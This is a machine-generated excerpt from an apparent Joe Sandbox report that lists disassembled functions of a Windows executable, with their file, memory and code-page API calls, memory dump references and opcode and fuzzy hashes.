                                                                                                                    • Instruction Fuzzy Hash: CDF03772419224ABDF202B999C06BFA77ECEF15B81B0404A5BD85B6151DAF0D980D6A1
                                                                                                                    Function 00B89785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1082 b89785-b89791 1083 b8979e-b897b5 ReadFile 1082->1083 1084 b89793-b8979b GetStdHandle 1082->1084 1085 b89811 1083->1085 1086 b897b7-b897c0 call b898bc 1083->1086 1084->1083 1087 b89814-b89817 1085->1087 1090 b897d9-b897dd 1086->1090 1091 b897c2-b897ca 1086->1091 1093 b897ee-b897f2 1090->1093 1094 b897df-b897e8 GetLastError 1090->1094 1091->1090 1092 b897cc 1091->1092 1095 b897cd-b897d7 call b89785 1092->1095 1097 b8980c-b8980f 1093->1097 1098 b897f4-b897fc 1093->1098 1094->1093 1096 b897ea-b897ec 1094->1096 1095->1087 1096->1087 1097->1087 1098->1097 1100 b897fe-b89807 GetLastError 1098->1100 1100->1097 1102 b89809-b8980a 1100->1102 1102->1095
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00B89795
                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00B897AD
                                                                                                                    • GetLastError.KERNEL32 ref: 00B897DF
                                                                                                                    • GetLastError.KERNEL32 ref: 00B897FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2244327787-0
                                                                                                                    • Opcode ID: d085f9eff6c00a037c7ebb7465eab11bed1407c40ec09403a87f9578238f0d70
                                                                                                                    • Instruction ID: b8a28d9b99035917f536be7cb79b605d2a971ad844270de935ffb3d1d163daaa
                                                                                                                    • Opcode Fuzzy Hash: d085f9eff6c00a037c7ebb7465eab11bed1407c40ec09403a87f9578238f0d70
                                                                                                                    • Instruction Fuzzy Hash: 96118E34914205EBDF207F64CC44A7937E9FF42BA0F188AA9F426861B0DBB49E44DB61
                                                                                                                    Function 00BAAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B8D710,00000000,00000000,?,00BAACDB,00B8D710,00000000,00000000,00000000,?,00BAAED8,00000006,FlsSetValue), ref: 00BAAD66
                                                                                                                    • GetLastError.KERNEL32(?,00BAACDB,00B8D710,00000000,00000000,00000000,?,00BAAED8,00000006,FlsSetValue,00BB7970,FlsSetValue,00000000,00000364,?,00BA98B7), ref: 00BAAD72
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BAACDB,00B8D710,00000000,00000000,00000000,?,00BAAED8,00000006,FlsSetValue,00BB7970,FlsSetValue,00000000), ref: 00BAAD80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177248105-0
                                                                                                                    • Opcode ID: b77bcdf7edebd3d5bc589472cab8f258b79006b9cc04e91f9f6bb6dd25405754
                                                                                                                    • Instruction ID: fcf95f663095d1374e02060ce7c13c890f1c51f028ab9b85eef743184bee2a69
                                                                                                                    • Opcode Fuzzy Hash: b77bcdf7edebd3d5bc589472cab8f258b79006b9cc04e91f9f6bb6dd25405754
                                                                                                                    • Instruction Fuzzy Hash: 3301F736209226AFC7224F689C84A5B7BD8EF46BA27110770F9C6D7560DF21D801C6F1
                                                                                                                    Function 00B89F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B8D343,00000001,?,?,?,00000000,00B9551D,?,?,?), ref: 00B89F9E
                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00B9551D,?,?,?,?,?,00B94FC7,?), ref: 00B89FE5
                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00B8D343,00000001,?,?), ref: 00B8A011
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4209713984-0
                                                                                                                    • Opcode ID: d7abc2847a6ab440dd7bc15625897b34a51f834bd538b0840152647fd0a3226a
                                                                                                                    • Instruction ID: de99eaf2204387b881635a6e19e2be486ae2cacbb39decb1566a0d032d0021b7
                                                                                                                    • Opcode Fuzzy Hash: d7abc2847a6ab440dd7bc15625897b34a51f834bd538b0840152647fd0a3226a
                                                                                                                    • Instruction Fuzzy Hash: A631B031204305AFEB19EF20D858B7A77E5FF84B15F040A5DF5819B2A0CB75AD48CBA2
                                                                                                                    Function 00B8A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B8C27E: _wcslen.LIBCMT ref: 00B8C284
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A2D9
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A30C
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A329
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2260680371-0
                                                                                                                    • Opcode ID: fe613f9bdf7a87303a8bd73ddf436f91ba3c61d3cf528fc309a93d383567197d
                                                                                                                    • Instruction ID: f46096d99943bc0563d4e555e766b405c1d88a6d9b74176179dd48882cbb1257
                                                                                                                    • Opcode Fuzzy Hash: fe613f9bdf7a87303a8bd73ddf436f91ba3c61d3cf528fc309a93d383567197d
                                                                                                                    • Instruction Fuzzy Hash: AF01B131200614AAFF21BB754C59BED37D8EF0A781F444496F901E60B1DB64CA81C7BA
                                                                                                                    Function 00BAB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BAB8B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                    • Opcode ID: 590aeb46bd6af2a3aed97245a54b5e079c6bcd04d34f1c9a6147f8658fef7ac1
                                                                                                                    • Instruction ID: b1b8baeaa8b70d53273963622b14e3ea9df0f3c9edaae042974a3acf1b8c202e
                                                                                                                    • Opcode Fuzzy Hash: 590aeb46bd6af2a3aed97245a54b5e079c6bcd04d34f1c9a6147f8658fef7ac1
                                                                                                                    • Instruction Fuzzy Hash: 6B41D87050828CAADF218E68CC84FF6BBE9EB56304F1404EDE5AA87143D735AA45DB60
                                                                                                                    Function 00BAAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00BAAFDD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String
                                                                                                                    • String ID: LCMapStringEx
                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                    • Opcode ID: 9fe5b69e176665cb081a369767cd111223df457bc12f4d834b4a55af7dddbdcc
                                                                                                                    • Instruction ID: 99341f8f481fd0cd7d6948e90ead97ead21833c0aec1cfee20f94dc7923b5c8b
                                                                                                                    • Opcode Fuzzy Hash: 9fe5b69e176665cb081a369767cd111223df457bc12f4d834b4a55af7dddbdcc
                                                                                                                    • Instruction Fuzzy Hash: 45010832544209BBCF169FA0DC06DEE7FA2EF49760F054294FE1466170CBB68A31EB91
                                                                                                                    Function 00BAAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BAA56F), ref: 00BAAF55
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                    • Opcode ID: 461ea8c872b10eb5a6aa83c5d4bceff324810b7ad9df2e2809274e5ce82fea79
                                                                                                                    • Instruction ID: fa0c0a616e0d3e458b8cb02ee25898ebe06c5263326c9c0599ad8d51992e1118
                                                                                                                    • Opcode Fuzzy Hash: 461ea8c872b10eb5a6aa83c5d4bceff324810b7ad9df2e2809274e5ce82fea79
                                                                                                                    • Instruction Fuzzy Hash: 53F09031689208BFCB065F54CC06CAD7BE5EF45B21B0041A4F808A6270DEB25E10DB95
                                                                                                                    Function 00BAADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Alloc
                                                                                                                    • String ID: FlsAlloc
                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                    • Opcode ID: cacba5113e91ec8f03c4a9db130dd7a9ce1e59581b4ae161d7822e5dba5968be
                                                                                                                    • Instruction ID: 8489f42ce385ad6311ad33ae76c04eb8a392936fa62a66ac817d89ee0be160d8
                                                                                                                    • Opcode Fuzzy Hash: cacba5113e91ec8f03c4a9db130dd7a9ce1e59581b4ae161d7822e5dba5968be
                                                                                                                    • Instruction Fuzzy Hash: 55E0E531689218BBD611AB65DC069BEBBD4DB85B21B0102E9F845A7260DEB15E00C6E6
                                                                                                                    Function 00BABBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00BAB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BABA44,?), ref: 00BAB7E6
                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BABA89,?,00000000), ref: 00BABC64
                                                                                                                    • GetCPInfo.KERNEL32(00000000,00BABA89,?,?,?,00BABA89,?,00000000), ref: 00BABC77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 546120528-0
                                                                                                                    • Opcode ID: 03d242e9f693be66e3279f9e252d7d609380ef6c9744fe2fe87c24de98776375
                                                                                                                    • Instruction ID: 12db3857ee67e0acc23229b068c72b58e90e3d4dbd15ffaadda9361542fd5916
                                                                                                                    • Opcode Fuzzy Hash: 03d242e9f693be66e3279f9e252d7d609380ef6c9744fe2fe87c24de98776375
                                                                                                                    • Instruction Fuzzy Hash: 7351F2709082459FDB209F75C881EBABBE5EF43310F1444FED4B68B263EB7599458B90
                                                                                                                    Function 00B89A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00B89A50,?,?,00000000,?,?,00B88CBC,?), ref: 00B89BAB
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00B88411,-00009570,00000000,000007F3), ref: 00B89BB6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    • Opcode ID: 420b8d0ab42b87a6ec4bfc5fabaf6f444c52e1973127d9500dfd524c7d4af5a4
                                                                                                                    • Instruction ID: cc4356464e03446857a14fa43e1607121dba87b8457c5bf65384ba9ee129717e
                                                                                                                    • Opcode Fuzzy Hash: 420b8d0ab42b87a6ec4bfc5fabaf6f444c52e1973127d9500dfd524c7d4af5a4
                                                                                                                    • Instruction Fuzzy Hash: 514189316043418BDF24AF25E58497AB7E5FB94720F188AADE89183270E7B0ED44CB91
                                                                                                                    Function 00BABA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00BA97E5: GetLastError.KERNEL32(?,00BC1030,00BA4674,00BC1030,?,?,00BA3F73,00000050,?,00BC1030,00000200), ref: 00BA97E9
                                                                                                                      • Part of subcall function 00BA97E5: _free.LIBCMT ref: 00BA981C
                                                                                                                      • Part of subcall function 00BA97E5: SetLastError.KERNEL32(00000000,?,00BC1030,00000200), ref: 00BA985D
                                                                                                                      • Part of subcall function 00BA97E5: _abort.LIBCMT ref: 00BA9863
                                                                                                                      • Part of subcall function 00BABB4E: _abort.LIBCMT ref: 00BABB80
                                                                                                                      • Part of subcall function 00BABB4E: _free.LIBCMT ref: 00BABBB4
                                                                                                                      • Part of subcall function 00BAB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BABA44,?), ref: 00BAB7E6
                                                                                                                    • _free.LIBCMT ref: 00BABA9F
                                                                                                                    • _free.LIBCMT ref: 00BABAD5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2991157371-0
                                                                                                                    • Opcode ID: ea793b6d723622c2f62d434d1eccfc8bfcef58ec6addaaa89554c1c4f9bf0e7f
                                                                                                                    • Instruction ID: e30cfd7c8cabd8463f7dae6dc735aea0a3c814646058ccc303d42c4c4e71b2c8
                                                                                                                    • Opcode Fuzzy Hash: ea793b6d723622c2f62d434d1eccfc8bfcef58ec6addaaa89554c1c4f9bf0e7f
                                                                                                                    • Instruction Fuzzy Hash: 04316F31908209AFDB14EFA8D441FADB7E5EF42320F2541D9E9249B2A3EF729D40DB50
                                                                                                                    Function 00B81E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B81E55
                                                                                                                      • Part of subcall function 00B83BBA: __EH_prolog.LIBCMT ref: 00B83BBF
                                                                                                                    • _wcslen.LIBCMT ref: 00B81EFD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2838827086-0
                                                                                                                    • Opcode ID: 42b937ac942a2e10a10c8a6824bb2ffa1652cf63df47bc60946174c85282dae7
                                                                                                                    • Instruction ID: d0de4956dcb4abcbf49ee5f6edb733936bfe3d884e89f7d90e795df1563c4ced
                                                                                                                    • Opcode Fuzzy Hash: 42b937ac942a2e10a10c8a6824bb2ffa1652cf63df47bc60946174c85282dae7
                                                                                                                    • Instruction Fuzzy Hash: DC312B71905209AFCF15EF98C945AEEBBFAEF58300F1008EAF845A7261C7365E11DB60
                                                                                                                    Function 00B89DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B873BC,?,?,?,00000000), ref: 00B89DBC
                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B89E70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1392018926-0
                                                                                                                    • Opcode ID: 1959649a79f4335445029bfc4ab3cd4527138eec423179c98b87b697991b5b08
                                                                                                                    • Instruction ID: 889c5ece4cec6778bfd57f631264303964ee08fe5aac97fc287f978920bb6b72
                                                                                                                    • Opcode Fuzzy Hash: 1959649a79f4335445029bfc4ab3cd4527138eec423179c98b87b697991b5b08
                                                                                                                    • Instruction Fuzzy Hash: BF21F031248246EBCB14EF34C891ABBBBE8EF95704F0849ACF4C583161D329E90DDB61
